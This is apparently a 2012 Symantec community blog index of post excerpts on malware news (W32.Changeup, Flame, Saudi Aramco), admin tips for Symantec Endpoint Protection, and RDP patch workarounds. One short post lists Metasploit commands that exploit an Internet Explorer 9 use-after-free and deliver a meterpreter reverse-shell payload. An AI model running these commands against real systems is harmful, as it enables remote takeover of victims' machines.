Security Community Blog
Showing posts tagged with 11.x
Brandon Noble | 30 Nov 2012 | 15 comments

In mid-2009, W32.Changeup was first discovered on systems around the world. Over the last few years, Symantec Security Response has profiled this threat, explained why it spreads, and shown how it was created. Since November 2012 we have seen weekly spikes in the number of W32.Changeup detections and infections. The increase in detections is a result of a renewed W32.Changeup campaign now active and in the wild.

When a system is compromised, W32.Changeup may install additional malware. These secondary threats have the ability to download even more malware...

Fabiano.Pessoa | 27 Sep 2012 | 0 comments

We have a vulnerability in IE 9, discovered on 17/09/2012, which can be exploited with the following commands in Backtrack 5 R2:


- msfupdate
- use exploit/windows/browser/ie_execcommand_uaf
- set SRVHOST 192.168...
- set PAYLOAD windows/meterpreter/reverse_tcp
- set LHOST 192.168...
- exploit

Let's beware the networking.


Brandon Noble | 30 Aug 2012 | 7 comments

Greetings everyone.

We are still getting a lot of questions about Symantec's coverage of the most recent Java 0-Day. I thought I would take a moment to jot down a list of our current coverage for this event, and hopefully save everyone some time and hassle.

Current Coverage:

  • ...

ABN | 22 Aug 2012 | 1 comment

Hello Gents,

We normally come across scenarios where LiveUpdate affects our usual work as a Symantec administrator. Scenarios like:

  1. Clients do not have the ability to launch LiveUpdate even though the policy has been set to do so, or vice versa.
  2. Low disk space causing SEP not to update on critical servers. Definitions are stored only on the OS drive, where space is a major concern.

By default the SEP definitions will be stored in the Operating System drive even if we install it in a different partition.

With the following process we can configure the LiveUpdate settings and the number of revisions kept on the SEP (client), and also change the location where they are stored.

I) To enable LiveUpdate on the SEP.

    From SEPM:

Mohammad Altaf Khan | 15 Aug 2012 | 1 comment

(Reuters) - Saudi Arabian Oil Co (Saudi Aramco) SDABO.UL said its computer systems had been shut down by a virus late on Wednesday, but it added that production had not been affected.

"An official source of Saudi Aramco confirmed that it had isolated electronic systems for the entire company today and cut off external access as an early precaution," said a statement in Arabic from the company.

The world's biggest oil company said that although the virus affected some computers, it did not penetrate key components of the network, which it said would return to normal operating mode soon.

"The source ... reiterated the lack of any effect at all on the work of production due to the strength of advanced protection systems," the statement added.

Rumours had spread among traders earlier on Wednesday that the state-owned company had been subjected to a hacking attack.

(Reporting By Reem Shamseddine and Angus McDowall; Editing by...

AR Sharma | 28 May 2012 | 5 comments

Just now 'The Flame', the most powerful malware to date, has been identified. Again, we must say that calling 'The Flame' a malware is an insult to 'The Flame'.

When the security community can call Stuxnet the first cyber weapon, then 'The Flame' should be called the first nuclear cyber weapon.

'Flame' is 20 times more complex than Stuxnet. Antivirus companies took 6 months to analyze Stuxnet. Imagine how much time and effort would be required to analyze 'The Flame'.

'Flame' is massive and most likely targeted at Iran and Israel.

Once a PC is infected with 'Flame', it steals all info including passwords, traffic, images, audio and keystrokes.

In the group of malware, 'Flame' joins the elite club along with Stuxnet and Duqu.

'Flame' is a sophisticated attack toolkit. When fully deployed, it's over 20 Mb in size. Such a huge size is due to many different...

Chetan Savade | 15 May 2012 | 0 comments

Hello Everyone,

Tips to improve performance, speed & security.

5 tips for PC health: Organize your folders, update Windows, run antivirus software

Working on a slow, disorganized computer can be frustrating. Read on for organization tips and guidelines to keep your PC on the right track using tools built in to the Windows operating system.

1. Organize your folders

2. Clean up your hard disk

3. Use System Restore

4. Keep Windows and Microsoft Office up-to-date

5. Run antivirus software and a spyware detection and removal tool

Reference:

Speed up your PC

A badly fragmented hard drive will bring even a top-of-the-line new computer to a grinding halt. Learn how a preventive maintenance plan can keep your Windows PC running smoothly and swiftly.


Sushanta | 03 May 2012 | 0 comments


I want to implement Split Tunneling for VPN Users in my Enterprise. While I do that I do want to have a restricted policy for the VPN users when they are off network and connected remotely. At the same time I do want to have the same policy applied to the users when they are on the network directly from office location.

Please suggest best practices. If anybody has implemented this in any of their companies, please help.



Sumit G | 21 Apr 2012 | 0 comments

SmcService is not starting up (for Windows XP).

Windows could not start the “Symantec Management Client” service.

When trying to start the service, an error is displayed on screen (Error 1053: The service did not respond to the start or control request in a timely fashion).

This problem is occurring due to some Symantec service effect.


  • Go to Run
  • Open the Services.msc.
  • Under the Services. Double click on “Symantec Management Client”.
  • Go to Logon Tab.
  • Uncheck the “Allow service to interact with desktop”.
  • Then Apply.
  • Go to General Tab and Start the...

AR Sharma | 15 Mar 2012 | 1 comment

Recently, major vulnerabilities in Microsoft Remote Desktop Protocol (RDP) were identified, and a patch was released by Microsoft. These vulnerabilities are categorized as 'critical' by all security forums. All organizations, whether small, medium or large, are sensitized and working on patch deployment and/or a workaround for fixing the same.

Patch deployment (especially on desktops) is a substantial activity. It may take days or even weeks or more to complete.

So the question arises: what to do to immediately remediate the threat while keeping business as usual? The answer lies in identifying the users using RDP and patching those users' machines on priority. All the remaining machines can be taken care of in due course.

There could be many workarounds. One of them could be using the SEP host-based firewall. Using a SEP host-based firewall policy, incoming RDP connections can be blocked. This policy can be applied to all clients in almost...